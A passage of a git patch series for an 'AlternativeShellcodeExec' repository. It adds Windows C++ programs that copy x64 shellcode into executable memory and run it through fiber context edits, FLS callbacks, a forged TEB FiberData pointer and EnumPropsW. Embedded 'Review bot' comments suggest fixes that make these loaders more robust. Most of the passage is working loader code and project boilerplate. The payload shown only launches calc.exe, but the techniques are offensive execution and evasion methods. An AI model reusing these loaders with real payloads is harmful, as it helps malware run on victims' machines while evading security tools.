+"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
+"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
+"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
+"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
+"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
+"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
+"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
+"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c"
+"\x63\x2e\x65\x78\x65\x00";
+
+
+//https://github.com/reactos/reactos/blob/2e1aeb12dfd8b44b4b57d377b59ef347dfe3386e/dll/win32/kernel32/client/fiber.c
+//https://doxygen.reactos.org/dd/d83/ndk_2ketypes_8h_source.html#l00179
+
+
+// s/o to ch3rn0byl and s4r1n
+// am I doing s00p3r c001 1337 gr33tz right?
+int main() { + + + /* + _TEB.SameTebFlags = _TEB + 0x17ee + dt _TEB: + + +0x17ee SameTebFlags : Uint2B + +0x17ee SafeThunkCall : Pos 0, 1 Bit + +0x17ee InDebugPrint : Pos 1, 1 Bit + +0x17ee HasFiberData : Pos 2, 1 Bit + +0x17ee SkipThreadAttach : Pos 3, 1 Bit + +0x17ee WerInShipAssertCode : Pos 4, 1 Bit + +0x17ee RanProcessInit : Pos 5, 1 Bit + +0x17ee ClonedThread : Pos 6, 1 Bit + +0x17ee SuppressDebugMsg : Pos 7, 1 Bit + +0x17ee DisableUserStackWalk : Pos 8, 1 Bit + +0x17ee RtlExceptionAttached : Pos 9, 1 Bit + +0x17ee InitialThread : Pos 10, 1 Bit + +0x17ee SessionAware : Pos 11, 1 Bit + +0x17ee LoadOwner : Pos 12, 1 Bit + +0x17ee LoaderWorker : Pos 13, 1 Bit + +0x17ee SkipLoaderInit : Pos 14, 1 Bit + + */ + + //_TEB* teb = NtCurrentTeb(); + //NT_TIB* tib = (NT_TIB*)teb; + //void* pTebFlags = (void*)((uintptr_t)teb + 0x17ee); + //char tebFlags = *(char*)pTebFlags; // it's actually a WORD but I don't care about the second byte + // + //BOOL hasFibData = (tebFlags >> 2) & 0b1; // False here, as the current thread is not yet a fiber + // + //printf("TebFlag => 0x%x\n", tebFlags); + //printf("Has Fiber Data : %s\n", (hasFibData ? "true" : "false")); + //printf("Fiber Data Ptr: %p\n", tib->FiberData); + + //https://github.com/reactos/reactos/blob/2e1aeb12dfd8b44b4b57d377b59ef347dfe3386e/dll/win32/kernel32/client/fiber.c#L256 + ConvertThreadToFiber(NULL); + + + //tebFlags = *(char*)pTebFlags; + //hasFibData = (tebFlags >> 2) & 0b1; // True here after call to ConvertThreadToFiber + // + //printf("TebFlag => 0x%x\n", tebFlags); + //printf("Has Fiber Data : %s\n", (hasFibData ? 
"true" : "false")); + //printf("Fiber Data Ptr: %p\n", tib->FiberData); + // + + /* + Important to note that tib->FiberData == __readgsqword(0x20) + */ + + LPVOID lpFiber = CreateFiber(0x100, (LPFIBER_START_ROUTINE)dummy, NULL); + LPVOID addr = VirtualAlloc(NULL, sizeof(op), MEM_COMMIT, PAGE_EXECUTE_READWRITE); + RtlMoveMemory(addr, op, sizeof(op)); + if (lpFiber == NULL) { + printf("GLE : %d", GetLastError()); + exit(0); + } + + /* + + Here we are changing the Fiber Context such that the Created Fiber's entry point + (lpFiber + 0xb0) + Now points to the newly allocated Shellcode. + + The fiber context resides at the created buffer returned by CreateFiber + + */ + uintptr_t* tgtFuncAddr = (uintptr_t*)((uintptr_t)lpFiber + 0xB0); + *tgtFuncAddr = (uintptr_t)addr; + + SwitchToFiber(lpFiber); +} \ No newline at end of file From c514775d4fe162545e594239968719fa3d7023c3 Mon Sep 17 00:00:00 2001 From: S4R1N Date: Sun, 28 Mar 2021 09:05:46 -0400 Subject: [PATCH 04/28] Dummy values everywhere --- AlternativeShellcodeExec.sln | 10 ++ FlsAlloc/FlsAlloc.cpp | 38 ++++++++ FlsAlloc/FlsAlloc.vcxproj | 147 ++++++++++++++++++++++++++++++ FlsAlloc/FlsAlloc.vcxproj.filters | 22 +++++ 4 files changed, 217 insertions(+) create mode 100644 FlsAlloc/FlsAlloc.cpp create mode 100644 FlsAlloc/FlsAlloc.vcxproj create mode 100644 FlsAlloc/FlsAlloc.vcxproj.filters diff --git a/AlternativeShellcodeExec.sln b/AlternativeShellcodeExec.sln index 6b123db..31f9a07 100644 --- a/AlternativeShellcodeExec.sln +++ b/AlternativeShellcodeExec.sln 
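Review bot: `addr` returned by VirtualAlloc is written to by RtlMoveMemory before the `lpFiber == NULL` check runs, and `addr` itself is never checked; hoist a combined `if (lpFiber == NULL || addr == NULL)` above the RtlMoveMemory line, and make that path `return 1;` rather than `exit(0)`, which reports success on failure. `dummy` is declared as `void dummy()` but cast to LPFIBER_START_ROUTINE, whose shape is `void WINAPI f(LPVOID)`; declaring it with that signature removes the cast and the mismatch. The `0xB0` offset is an internal fiber-object layout and the comment above it does not say which Windows build it was verified on — record that, e.g. `// +0xB0 = fiber start routine slot; layout verified on <WINDOWS BUILD PLACEHOLDER>, undocumented and may differ by build`. The ConvertThreadToFiber result is also discarded even though the fiber-data commentary above it depends on that call succeeding.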
@@ -51,6 +51,8 @@ Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "InitOnceExecuteOnce", "Init EndProject Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "FiberContextEdit", "FiberContextEdit\FiberContextEdit.vcxproj", "{1E97F40F-E056-4468-94EA-15636B98B5D0}" EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "FlsAlloc", "FlsAlloc\FlsAlloc.vcxproj", "{784E8C7B-CCB3-40CF-8FEF-7D01A563CEE5}" +EndProject Global GlobalSection(SolutionConfigurationPlatforms) = preSolution Debug|x64 = Debug|x64 @@ -251,6 +253,14 @@ Global {1E97F40F-E056-4468-94EA-15636B98B5D0}.Release|x64.Build.0 = Release|x64 {1E97F40F-E056-4468-94EA-15636B98B5D0}.Release|x86.ActiveCfg = Release|Win32 {1E97F40F-E056-4468-94EA-15636B98B5D0}.Release|x86.Build.0 = Release|Win32 + {784E8C7B-CCB3-40CF-8FEF-7D01A563CEE5}.Debug|x64.ActiveCfg = Debug|x64 + {784E8C7B-CCB3-40CF-8FEF-7D01A563CEE5}.Debug|x64.Build.0 = Debug|x64 + {784E8C7B-CCB3-40CF-8FEF-7D01A563CEE5}.Debug|x86.ActiveCfg = Debug|Win32 + {784E8C7B-CCB3-40CF-8FEF-7D01A563CEE5}.Debug|x86.Build.0 = Debug|Win32 + {784E8C7B-CCB3-40CF-8FEF-7D01A563CEE5}.Release|x64.ActiveCfg = Release|x64 + {784E8C7B-CCB3-40CF-8FEF-7D01A563CEE5}.Release|x64.Build.0 = Release|x64 + {784E8C7B-CCB3-40CF-8FEF-7D01A563CEE5}.Release|x86.ActiveCfg = Release|Win32 + {784E8C7B-CCB3-40CF-8FEF-7D01A563CEE5}.Release|x86.Build.0 = Release|Win32 EndGlobalSection GlobalSection(SolutionProperties) = preSolution HideSolutionNode = FALSE diff --git a/FlsAlloc/FlsAlloc.cpp b/FlsAlloc/FlsAlloc.cpp new file mode 100644 index 0000000..4076e18 --- /dev/null +++ b/FlsAlloc/FlsAlloc.cpp 
@@ -0,0 +1,38 @@
+#include
+#include
+
+// alfarom256 calc shellcode
+unsigned char op[] =
+"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
+"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
+"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
+"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
+"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
+"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
+"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
+"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
+"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
+"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
+"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
+"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
+"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
+"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
+"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
+"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
+"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
+"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c"
+"\x63\x2e\x65\x78\x65\x00";
+
+int main() {
+
+ HANDLE hProcess = ::GetCurrentProcess();
+
+ LPVOID address = ::VirtualAlloc(NULL, sizeof(op), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+ memcpy(address, &op[0], sizeof(op));
+
+ DWORD dIndex = ::FlsAlloc((PFLS_CALLBACK_FUNCTION)address);
+ CONST CHAR* dummy = "dummy";
+
+ FlsSetValue(dIndex, &dummy);
+
+}
\ No newline at end of file
diff --git a/FlsAlloc/FlsAlloc.vcxproj b/FlsAlloc/FlsAlloc.vcxproj
new file mode 100644
index 0000000..be1f73e
--- /dev/null
+++ b/FlsAlloc/FlsAlloc.vcxproj
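Review bot: `dIndex` is passed to FlsSetValue without first comparing it to `FLS_OUT_OF_INDEXES`, so an FlsAlloc failure silently sets a value on an invalid slot; add `if (dIndex == FLS_OUT_OF_INDEXES) return 1;` between the two calls. `&dummy` hands FlsSetValue the address of the local `const CHAR*`, i.e. a `const CHAR**`, where `dummy` itself looks like the intended value — if any non-null pointer will do, a comment saying so would stop the next reader from "fixing" it. `hProcess` is unused, and the VirtualAlloc result is unchecked before memcpy as raised on SysEnumSourceFiles.cpp.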
@@ -0,0 +1,147 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + 16.0 + Win32Proj + {784e8c7b-ccb3-40cf-8fef-7d01a563cee5} + FlsAlloc + 10.0 + + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + + + + + + + + + + + + + + + + + + + true + + + false + + + true + + + false + + + + Level3 + true + WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + Level3 + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + + + + + \ No newline at end of file diff --git a/FlsAlloc/FlsAlloc.vcxproj.filters b/FlsAlloc/FlsAlloc.vcxproj.filters new file mode 100644 index 0000000..e91adf8 --- /dev/null +++ b/FlsAlloc/FlsAlloc.vcxproj.filters @@ -0,0 +1,22 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + + + Source Files + + + \ No newline at end of file From 1419707e77629e418b791502fdb31d700eb9a98b Mon Sep 17 00:00:00 2001 
From: alfarom256 Date: Sun, 28 Mar 2021 12:44:45 -0400 Subject: [PATCH 05/28] Added RtlUserFiberStart method. --- AlternativeShellcodeExec.sln | 10 ++ RtlUserFiberStart/RtlUserFiberStart.vcxproj | 147 ++++++++++++++++++ .../RtlUserFiberStart.vcxproj.filters | 22 +++ RtlUserFiberStart/Source.cpp | 56 +++++++ 4 files changed, 235 insertions(+) create mode 100644 RtlUserFiberStart/RtlUserFiberStart.vcxproj create mode 100644 RtlUserFiberStart/RtlUserFiberStart.vcxproj.filters create mode 100644 RtlUserFiberStart/Source.cpp diff --git a/AlternativeShellcodeExec.sln b/AlternativeShellcodeExec.sln index 6b123db..c53c3bc 100644 --- a/AlternativeShellcodeExec.sln +++ b/AlternativeShellcodeExec.sln @@ -51,6 +51,8 @@ Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "InitOnceExecuteOnce", "Init EndProject Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "FiberContextEdit", "FiberContextEdit\FiberContextEdit.vcxproj", "{1E97F40F-E056-4468-94EA-15636B98B5D0}" EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "RtlUserFiberStart", "RtlUserFiberStart\RtlUserFiberStart.vcxproj", "{667D6630-708C-43D1-BFEB-733FF67B55D8}" +EndProject Global GlobalSection(SolutionConfigurationPlatforms) = preSolution Debug|x64 = Debug|x64 
@@ -251,6 +253,14 @@ Global {1E97F40F-E056-4468-94EA-15636B98B5D0}.Release|x64.Build.0 = Release|x64 {1E97F40F-E056-4468-94EA-15636B98B5D0}.Release|x86.ActiveCfg = Release|Win32 {1E97F40F-E056-4468-94EA-15636B98B5D0}.Release|x86.Build.0 = Release|Win32 + {667D6630-708C-43D1-BFEB-733FF67B55D8}.Debug|x64.ActiveCfg = Debug|x64 + {667D6630-708C-43D1-BFEB-733FF67B55D8}.Debug|x64.Build.0 = Debug|x64 + {667D6630-708C-43D1-BFEB-733FF67B55D8}.Debug|x86.ActiveCfg = Debug|Win32 + {667D6630-708C-43D1-BFEB-733FF67B55D8}.Debug|x86.Build.0 = Debug|Win32 + {667D6630-708C-43D1-BFEB-733FF67B55D8}.Release|x64.ActiveCfg = Release|x64 + {667D6630-708C-43D1-BFEB-733FF67B55D8}.Release|x64.Build.0 = Release|x64 + {667D6630-708C-43D1-BFEB-733FF67B55D8}.Release|x86.ActiveCfg = Release|Win32 + {667D6630-708C-43D1-BFEB-733FF67B55D8}.Release|x86.Build.0 = Release|Win32 EndGlobalSection GlobalSection(SolutionProperties) = preSolution HideSolutionNode = FALSE diff --git a/RtlUserFiberStart/RtlUserFiberStart.vcxproj b/RtlUserFiberStart/RtlUserFiberStart.vcxproj new file mode 100644 index 0000000..96da45f --- /dev/null +++ b/RtlUserFiberStart/RtlUserFiberStart.vcxproj 
@@ -0,0 +1,147 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + 16.0 + Win32Proj + {667d6630-708c-43d1-bfeb-733ff67b55d8} + RtlUserFiberStart + 10.0 + + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + + + + + + + + + + + + + + + + + + + true + + + false + + + true + + + false + + + + Level3 + true + WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + Level3 + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + + + + + \ No newline at end of file diff --git a/RtlUserFiberStart/RtlUserFiberStart.vcxproj.filters b/RtlUserFiberStart/RtlUserFiberStart.vcxproj.filters new file mode 100644 index 0000000..3e7e62e --- /dev/null +++ b/RtlUserFiberStart/RtlUserFiberStart.vcxproj.filters @@ -0,0 +1,22 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + + + Source Files + + + \ No newline at end of file diff --git a/RtlUserFiberStart/Source.cpp b/RtlUserFiberStart/Source.cpp new file mode 100644 index 0000000..2ef1d6d --- /dev/null +++ b/RtlUserFiberStart/Source.cpp 
@@ -0,0 +1,56 @@ +// alfarom256 + +#include +#include + +#define TEB_FIBERDATA_PTR_OFFSET 0x17ee +#define LPFIBER_RIP_OFFSET 0x0a8 + +// calc shellcode +unsigned char op[] = +"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" +"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" +"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" +"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" +"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" +"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" +"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" +"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" +"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" +"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" +"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" +"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" +"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" +"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" +"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" +"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" +"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" +"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" +"\x63\x2e\x65\x78\x65\x00"; + +typedef int(WINAPI* tRtlUserFiberStart)(); + +int main() { + HMODULE hMod = GetModuleHandleA("ntdll"); + if (!hMod) { return -1; } + tRtlUserFiberStart lpRtlUserFiberStart = (tRtlUserFiberStart)GetProcAddress(hMod, "RtlUserFiberStart"); + if (!lpRtlUserFiberStart) { return -1; } + + _TEB* teb = NtCurrentTeb(); + NT_TIB* tib = (NT_TIB*)teb; + void* pTebFlags = (void*)((uintptr_t)teb + TEB_FIBERDATA_PTR_OFFSET); + *(char*)pTebFlags = *(char*)pTebFlags | 0b100; // set the HasFiberData bit + + LPVOID addr = VirtualAlloc(NULL, sizeof(op), MEM_COMMIT, PAGE_EXECUTE_READWRITE); + if (!addr) { + return GetLastError(); + } + 
RtlMoveMemory(addr, op, sizeof(op)); + + uintptr_t lpDummyFiberData = (uintptr_t)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 0x100); + *(LPVOID*)(lpDummyFiberData + 0x0a8) = addr; // store the shelcode address at the offset of the FiberContext RIP in the Fiber Data + //call qword ptr [ntdll!_guard_dispatch_icall_fptr (00007ffa`218b4000)] ds:00007ffa`218b4000={ntdll!guard_dispatch_icall_nop (00007ffa`217cfa80)} + + __writegsqword(0x20, lpDummyFiberData); // set the FiberData pointer + lpRtlUserFiberStart(); +} From 127f66746f42f3a0277316480174b6ffc31058c3 Mon Sep 17 00:00:00 2001 From: S4R1N Date: Sun, 28 Mar 2021 22:22:00 -0400 Subject: [PATCH 06/28] Anotha One --- AlternativeShellcodeExec.sln | 10 ++ EnumPropsW/EnumPropsW.cpp | 38 +++++++ EnumPropsW/EnumPropsW.vcxproj | 147 ++++++++++++++++++++++++++ EnumPropsW/EnumPropsW.vcxproj.filters | 22 ++++ 4 files changed, 217 insertions(+) create mode 100644 EnumPropsW/EnumPropsW.cpp create mode 100644 EnumPropsW/EnumPropsW.vcxproj create mode 100644 EnumPropsW/EnumPropsW.vcxproj.filters diff --git a/AlternativeShellcodeExec.sln b/AlternativeShellcodeExec.sln index 31f9a07..142bd97 100644 --- a/AlternativeShellcodeExec.sln +++ b/AlternativeShellcodeExec.sln @@ -53,6 +53,8 @@ Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "FiberContextEdit", "FiberCo EndProject Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "FlsAlloc", "FlsAlloc\FlsAlloc.vcxproj", "{784E8C7B-CCB3-40CF-8FEF-7D01A563CEE5}" EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumPropsW", "EnumPropsW\EnumPropsW.vcxproj", "{2253DC4A-3941-4809-A20D-416CA71F799A}" +EndProject Global GlobalSection(SolutionConfigurationPlatforms) = preSolution Debug|x64 = Debug|x64 
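Review bot: `HeapAlloc` can return NULL and the next statement in main() writes through it, `*(LPVOID*)(lpDummyFiberData + 0x0a8) = addr;`, so an allocation failure becomes a write to address 0xa8; guard it the way the `VirtualAlloc` result above it is guarded, `if (!lpDummyFiberData) { return GetLastError(); }`. The file defines `LPFIBER_RIP_OFFSET 0x0a8` and then repeats the literal at the store site; use the macro, `*(LPVOID*)(lpDummyFiberData + LPFIBER_RIP_OFFSET) = addr;`. `tib` is assigned from `teb` and never read, the commented-out debugger output line below the store is leftover noise, and the store-site comment misspells "shelcode". `TEB_FIBERDATA_PTR_OFFSET` and `LPFIBER_RIP_OFFSET` are build-specific structure offsets with no provenance; the defining comment should record the Windows build they were verified against, since they fail silently anywhere else.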
@@ -261,6 +263,14 @@ Global {784E8C7B-CCB3-40CF-8FEF-7D01A563CEE5}.Release|x64.Build.0 = Release|x64 {784E8C7B-CCB3-40CF-8FEF-7D01A563CEE5}.Release|x86.ActiveCfg = Release|Win32 {784E8C7B-CCB3-40CF-8FEF-7D01A563CEE5}.Release|x86.Build.0 = Release|Win32 + {2253DC4A-3941-4809-A20D-416CA71F799A}.Debug|x64.ActiveCfg = Debug|x64 + {2253DC4A-3941-4809-A20D-416CA71F799A}.Debug|x64.Build.0 = Debug|x64 + {2253DC4A-3941-4809-A20D-416CA71F799A}.Debug|x86.ActiveCfg = Debug|Win32 + {2253DC4A-3941-4809-A20D-416CA71F799A}.Debug|x86.Build.0 = Debug|Win32 + {2253DC4A-3941-4809-A20D-416CA71F799A}.Release|x64.ActiveCfg = Release|x64 + {2253DC4A-3941-4809-A20D-416CA71F799A}.Release|x64.Build.0 = Release|x64 + {2253DC4A-3941-4809-A20D-416CA71F799A}.Release|x86.ActiveCfg = Release|Win32 + {2253DC4A-3941-4809-A20D-416CA71F799A}.Release|x86.Build.0 = Release|Win32 EndGlobalSection GlobalSection(SolutionProperties) = preSolution HideSolutionNode = FALSE diff --git a/EnumPropsW/EnumPropsW.cpp b/EnumPropsW/EnumPropsW.cpp new file mode 100644 index 0000000..ef48f86 --- /dev/null +++ b/EnumPropsW/EnumPropsW.cpp 
@@ -0,0 +1,38 @@ +#include +#include + +// alfarom256 calc shellcode +unsigned char op[] = +"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" +"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" +"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" +"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" +"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" +"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" +"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" +"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" +"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" +"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" +"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" +"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" +"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" +"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" +"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" +"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" +"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" +"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" +"\x63\x2e\x65\x78\x65\x00"; + + + +int main() { + + + LPVOID addr = ::VirtualAlloc(NULL, sizeof(op), MEM_COMMIT, PAGE_EXECUTE_READWRITE); + ::RtlMoveMemory(addr, op, sizeof(op)); + + HWND dummy = ::GetTopWindow(NULL); + ::EnumPropsW(dummy, (PROPENUMPROCW)addr); + + return 0; +} \ No newline at end of file diff --git a/EnumPropsW/EnumPropsW.vcxproj b/EnumPropsW/EnumPropsW.vcxproj new file mode 100644 index 0000000..3d4575d --- /dev/null +++ b/EnumPropsW/EnumPropsW.vcxproj 
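Review bot: `::VirtualAlloc` may return NULL and `::RtlMoveMemory(addr, op, sizeof(op));` in main() copies into it unchecked, turning an allocation failure into a write to address 0; RtlUserFiberStart/Source.cpp in this series already has the pattern, `if (!addr) { return GetLastError(); }`, between the two calls. The same unchecked `VirtualAlloc` followed by `memcpy` appears in the LdrEnumerateLoadedModules.cpp and EnumLanguageGroupLocalesW.cpp hunks later in this series, while LdrpCallInitRoutine/Source.cpp checks it with `if (!address) { return -1; }`. Picking one of those two error conventions and using it in all four files would keep the examples consistent.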
@@ -0,0 +1,147 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + 16.0 + Win32Proj + {2253dc4a-3941-4809-a20d-416ca71f799a} + EnumPropsW + 10.0 + + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + + + + + + + + + + + + + + + + + + + true + + + false + + + true + + + false + + + + Level3 + true + WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + Level3 + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + + + + + \ No newline at end of file diff --git a/EnumPropsW/EnumPropsW.vcxproj.filters b/EnumPropsW/EnumPropsW.vcxproj.filters new file mode 100644 index 0000000..43f1f08 --- /dev/null +++ b/EnumPropsW/EnumPropsW.vcxproj.filters @@ -0,0 +1,22 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + + + Source Files + + + \ No newline at end of file From 3a41ab1ee90031fab95a6fb949b8d33a5e442c3d Mon Sep 17 00:00:00 2001 
